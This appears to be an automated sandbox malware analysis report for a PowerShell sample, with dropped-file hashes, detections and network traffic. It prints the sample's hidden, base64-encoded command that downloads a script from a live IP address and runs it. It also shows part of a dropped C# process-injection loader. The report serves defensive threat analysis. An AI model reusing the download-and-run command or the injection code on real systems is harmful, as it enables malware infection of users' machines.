                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658637" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Jan 2 19:29:30 2025, 1st section name ".debug$S"
                                                                      Category:dropped
                                                                      Size (bytes):1336
                                                                      Entropy (8bit):3.9693859673122383
                                                                      Encrypted:false
                                                                      SSDEEP:24:Hym9p4yu2/plQH5hwKTFexmfwI+ycuZhNJGakSYXPNnqSSd:lumLQZKKTAxmo1ulJGa3YFqSC
                                                                      MD5:1B6AE310BA78AA657B7E3CFBF0A583AF
                                                                      SHA1:323F88EAB1C2D18C05582DE5D7BE03C211DD935F
                                                                      SHA-256:402EB382162D74F05CC8DEC381EF753B2A6F3DB915B20F6DADA2A7CEF99BE0BF
                                                                      SHA-512:4D0A49324E3D7DEC4B0E32EE33CC70A410E6B8FD783A55CEB078E19674D7C1589CAF8B2110A8391000084EAA21DBD41EE8DF1A80AFD9BC4B94816A6BBDEBC721
                                                                      Malicious:false
                                                                      Preview:L.....vg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP....................9.B.Q>...tq............5.......C:\Users\user\AppData\Local\Temp\RES4C9B.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.a.c.i.p.m.p.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                      File Type:MSVC .res
                                                                      Category:dropped
                                                                      Size (bytes):652
                                                                      Entropy (8bit):3.0737787616577057
                                                                      Encrypted:false
                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDGak7YnqqYXPN5Dlq5J:+RI+ycuZhNJGakSYXPNnqX
                                                                      MD5:97DFA4399042C6513EF99F9C7471BFAA
                                                                      SHA1:1EF705AC5BCAD535548C56CDBEA84B97E2FBA479
                                                                      SHA-256:68E92F3471464B03E0106FC4DB07C9EACC126BFE4B9A8A14F3F2461ED5E36CF9
                                                                      SHA-512:C663D41EDAD72179437034C691E339CB12194753EB4C32EE8A3E519D2D563438B51468FEF14DD09CBF49ECBFBFC78BD08B19DBF08D48E8ECD3DDFE0A96905BBC
                                                                      Malicious:false
                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.a.c.i.p.m.p.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.a.c.i.p.m.p.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):11063
                                                                      Entropy (8bit):4.54611001642782
                                                                      Encrypted:false
                                                                      SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo6uT:2oYLoH97t/Z7pgjvzf5DT
                                                                      MD5:3FA79DECFF8805745CEA8116D9BB2643
                                                                      SHA1:92343C5FA2C768B964AE3A4E9136E5D7193E8558
                                                                      SHA-256:E6852A401B53A7AF04D57AA1E4FC9621E3DFFC1221534142316A27AE67E8F89C
                                                                      SHA-512:5C2879E59FA6609E6E87F70C5237B250A906BF7DD13A343DAC9E81635B1FC91AD9374E643A306B99503C52CE9BD56554A64AA132584C732D43EE39FB17305D78
                                                                      Malicious:true
                                                                      Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):206
                                                                      Entropy (8bit):4.843266107095087
                                                                      Encrypted:false
                                                                      SSDEEP:6:pAu+H2L/6K2923fhGM2zba0zxszI923fhGM2zb1WH:p37L/6Kzpbh0wpbr
                                                                      MD5:6CCEC30D380707E04A225024B8DC1472
                                                                      SHA1:5FFE0A08F9427DA4D90C8C87FE12D92F9787F3FF
                                                                      SHA-256:EE37BF62A7B90C2AC80A63DF783DBB2AFD2BAEFAF5D48B5281B4559BEF5C9E44
                                                                      SHA-512:A867FB9DCAA17C3262ADE731C101EAA2B386A4D5331F7524625E2D2C9AF681CFFFAE36B8007EC53597F10DB8EBD72ACF2C5850E27C8AC20CC2D6532F7D6C8157
                                                                      Malicious:true
                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.0.cs"
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):9728
                                                                      Entropy (8bit):4.627020999078849
                                                                      Encrypted:false
                                                                      SSDEEP:192:FRH6HN4QhfNQ8q8888yYAd3vRjOaaUxRa95MqBYkeN45qTY:ENxN3v9Od+a95MqOS50
                                                                      MD5:C3A1CACAB6C9DA264831929FB1BECF27
                                                                      SHA1:469CDA1C3E7176E41474CFA898196BB4B8D9EC85
                                                                      SHA-256:FA2E5E84D3E56887507BEBC6113440F5E20B9F6C2500D94B3C95AC39EDE7D8BE
                                                                      SHA-512:5D5D5EFFD4AED411B451654CC0E8243675EBAF9E6C8FCBB34B1E00EB75BFFC3F2E6B39412BD91C8E846719187DEE86F1969FA8AFE1468FEE74026AB26381742D
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....vg...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                      Category:modified
                                                                      Size (bytes):705
                                                                      Entropy (8bit):5.174004498686329
                                                                      Encrypted:false
                                                                      SSDEEP:12:KMi/qR37L/6Kzpbh0wpbqKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoqdn6Kz9cKax5DqBVKVrdFAMBJTH
                                                                      MD5:EFEEDF8FE3E6DDBBB1A7ACF244288158
                                                                      SHA1:AD3BAE981994E5DE46F029AB94FF49A4B031F339
                                                                      SHA-256:0A084D7617D715774A973102B53C228334E454AC879356B313B8E98C3B118493
                                                                      SHA-512:5F4F881C7AA25F77D11A006B05A5B453C6447E2B186EF2D7B2DB3FA589F8DDD52FE825AC3C92F2970B66C6029AEB4C10BB1A630239BDF67FF628BB6CCAD2759D
                                                                      Malicious:false
                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6222
                                                                      Entropy (8bit):3.703385685445227
                                                                      Encrypted:false
                                                                      SSDEEP:96:aTBHCXoYkvhkvCCtFO0AEwHflIO0AE6Hflc:aVUDFXHXz
                                                                      MD5:78B568902037A561709F4152E51F7366
                                                                      SHA1:EB607440C5F08E70BBC1B113AB2BF07335890F52
                                                                      SHA-256:449943E40119BD85D50F1832D65B2CAFFB542DC05620EE8273D6236A0F8130B3
                                                                      SHA-512:7D10BCE5A8C27314B8747CD6C1F6998FA6A386D2663730E3471FD06E634F8EA7267B497C9AD151FCB9B48E82A409F734F73721EFBF20CA69CD8547CB86A9FA95
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...d.......~/.B]..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......M..B]..u.9.B]......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl"Z......B.....................Bdg.A.p.p.D.a.t.a...B.V.1....."Z....Roaming.@......DWSl"Z......C.......................[.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl"Z......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW#r..Windows.@......DWSl"Z......E.....................D_..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl"Z......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl"Z......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl"Z.....q...........
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6222
                                                                      Entropy (8bit):3.703385685445227
                                                                      Encrypted:false
                                                                      SSDEEP:96:aTBHCXoYkvhkvCCtFO0AEwHflIO0AE6Hflc:aVUDFXHXz
                                                                      MD5:78B568902037A561709F4152E51F7366
                                                                      SHA1:EB607440C5F08E70BBC1B113AB2BF07335890F52
                                                                      SHA-256:449943E40119BD85D50F1832D65B2CAFFB542DC05620EE8273D6236A0F8130B3
                                                                      SHA-512:7D10BCE5A8C27314B8747CD6C1F6998FA6A386D2663730E3471FD06E634F8EA7267B497C9AD151FCB9B48E82A409F734F73721EFBF20CA69CD8547CB86A9FA95
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...d.......~/.B]..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......M..B]..u.9.B]......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl"Z......B.....................Bdg.A.p.p.D.a.t.a...B.V.1....."Z....Roaming.@......DWSl"Z......C.......................[.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl"Z......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW#r..Windows.@......DWSl"Z......E.....................D_..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl"Z......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl"Z......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl"Z.....q...........
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Windows\Temp\Package.exe>), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):61
                                                                      Entropy (8bit):4.981292305417088
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYm5sMsgSE:HRYFVmyMsVE
                                                                      MD5:023F236CBD84BD3887E1186F9DE7359E
                                                                      SHA1:B7F015A8775C701D8F281541FDBF4B4A605C6070
                                                                      SHA-256:26F16FF4B0A1FED15960BA8E5EAB8DDB403265F8BB39AAED310A06998333CFF2
                                                                      SHA-512:327EC237DB8AC9C0BA6FC13738B08B73AC1BA3268BF967DF5AEA37DADC03FDB4E1FF75893FA276D08137CE4C9243BCFB2E0B199BC58B7B1A1BD076D6EFE3E6BC
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut]..URL=file:///C:\Windows\Temp\Package.exe..
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):206304
                                                                      Entropy (8bit):5.9403786086887225
                                                                      Encrypted:false
                                                                      SSDEEP:3072:gyOSSX7XA5RwkP10/Cg+ufLLobyT9S9jHkQPEZS0bGAPo:tEXjA5yBF+ma9jHfPITGb
                                                                      MD5:2696D944FFBEF69510B0C826446FD748
                                                                      SHA1:E4106861076981799719876019FE5224EAC2655C
                                                                      SHA-256:A4F53964CDDDCCCBD1B46DA4D3F7F5F4292B5DD11C833D3DB3A1E7DEF36DA69A
                                                                      SHA-512:C286BC2DA757CBB2A28CF516A4A273DD11B15F674D5F698A713DC794F013B7502A8893AB6041E51BAB3CDD506A18C415B9DF8483B19E312F8FCB88923F42B8EB
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: script.ps1, Detection: malicious, Browse
                                                                      • Filename: script.hta, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s..u...u...u.......u.......u...u...w.......u.......u......u.......u..Rich.u..........PE..L...........................................0....@..........................0......&G....@... .............................tH.......`...................!.......*.....T...........................H...@............@..l............................text...T........................... ..`.data...t....0......................@....idata..,....@......."..............@..@.rsrc........`.......@..............@..@.reloc...*.......,..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):90112
                                                                      Entropy (8bit):6.329772980958026
                                                                      Encrypted:false
                                                                      SSDEEP:1536:L02ifPleVQ8zxlaSRslYzy26igsbuNdn4fuH1e6tsWy4cdlETcgS/iG:5iV4Qaxltsl/ggsCN3oBlQcgkiG
                                                                      MD5:33AE2B9C3E710254FE2E2CE35FF8A7C8
                                                                      SHA1:109E32187254B27E04EF18BBE1B48FAD42BCA841
                                                                      SHA-256:9C2838E120C7ED5B582BEDC6177F14A52AA578ADEEA269D0F96FC71A95BD6E68
                                                                      SHA-512:2ABE017E2F1D29FE789206D6483B9B33E7ABD0871300D678EABA15E390D55C5E197D6CEA6EA32DFDEE5F65D082574ADCC192A4FC0C9506BBBA8AD7E957E12599
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x%S;.K.;.K.;.K.paH.1.K.paN...K.paO./.K.=.N.$.K.=.O.*.K.=.H./.K.paJ.8.K.;.J.n.K.V.B.:.K.V.K.:.K.V...:.K.V.I.:.K.Rich;.K.........PE..L....rvg...........!...&............c.....................................................@..........................J..T...$K..(...............................,....>..p............................=..@............... ............................text............................... ..`.rdata...a.......b..................@..@.data...<....`.......D..............@....rsrc................N..............@..@.reloc..,............P..............@..B........................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                      Category:dropped
                                                                      Size (bytes):1835008
                                                                      Entropy (8bit):4.421994169829237
                                                                      Encrypted:false
                                                                      SSDEEP:6144:QSvfpi6ceLP/9skLmb0OTTWSPHaJG8nAgeMZMMhA2fX4WABlEnN30uhiTw:7vloTTW+EZMM6DFyZ03w
                                                                      MD5:F56BC8535060B0914589B8317E8CCDA8
                                                                      SHA1:27C868DC22E6059BE9E40B1F0DDA4CC9BCFDC435
                                                                      SHA-256:60E6A12E2B5A10295A4FC6BCF65A91F5A3F23967B370855F71518A6DE809AAC6
                                                                      SHA-512:F31E840CF2A37193FCACE0CA9499BD44412D9CF288DD50E1DDA25957BCE0B64E519A0B58352581DCC9A813C61F03A2FE784C82CA6F49AFF273EA8C9F56BA67AA
                                                                      Malicious:false
                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.-b%B]..............................................................................................................................................................................................................................................................................................................................................^.u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:ASCII text, with no line terminators
                                                                      Entropy (8bit):4.5681900236226065
                                                                      TrID:
                                                                        File name:2 ps1.ps1
                                                                        File size:164 bytes
                                                                        MD5:005b395fecc3e18d5bc9acb93bf96a4f
                                                                        SHA1:34db5ff90015817fe8b2fe56ca241d6965ae95d4
                                                                        SHA256:5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0
                                                                        SHA512:199d54c7cda83e493e611da4f063baec08cbc6606f8fcedce13dc2413d67133ab26d68045981006db2eb3b996513cac09654867eb3cf00eaaac0a947934e6ff8
                                                                        SSDEEP:3:VSJJFIf9oM3KpGvtFsjktRGxMtDmh/pS5hfkUkmCCHWkQogkjVvmBeaIvCLf+1de:s81R3KU7sjkt6F/8QpC2kQ9yJmgv4fkU
                                                                        TLSH:A5C0806481187E58CE1E9E6812553F4310011521D7B41300F57114147802159C61DC4C
                                                                        File Content Preview:powershell -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA
                                                                        Icon Hash:3270d6baae77db44
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-01-02T19:14:09.008753+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549714185.149.146.16480TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 2, 2025 19:14:08.375011921 CET4971480192.168.2.5185.149.146.164
                                                                        Jan 2, 2025 19:14:08.379792929 CET8049714185.149.146.164192.168.2.5
                                                                        Jan 2, 2025 19:14:08.379920959 CET4971480192.168.2.5185.149.146.164
                                                                        Jan 2, 2025 19:14:08.382884979 CET4971480192.168.2.5185.149.146.164
                                                                        Jan 2, 2025 19:14:08.387716055 CET8049714185.149.146.164192.168.2.5
                                                                        Jan 2, 2025 19:14:09.008609056 CET8049714185.149.146.164192.168.2.5
                                                                        Jan 2, 2025 19:14:09.008678913 CET8049714185.149.146.164192.168.2.5
                                                                        Jan 2, 2025 19:14:09.008691072 CET8049714185.149.146.164192.168.2.5
                                                                        Jan 2, 2025 19:14:09.008753061 CET4971480192.168.2.5185.149.146.164
                                                                        Jan 2, 2025 19:14:09.228192091 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.233108997 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.233200073 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.233508110 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.238270044 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861555099 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861597061 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861620903 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861639023 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861649990 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861660957 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861677885 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861686945 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.861689091 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861702919 CET8049716147.45.44.131192.168.2.5
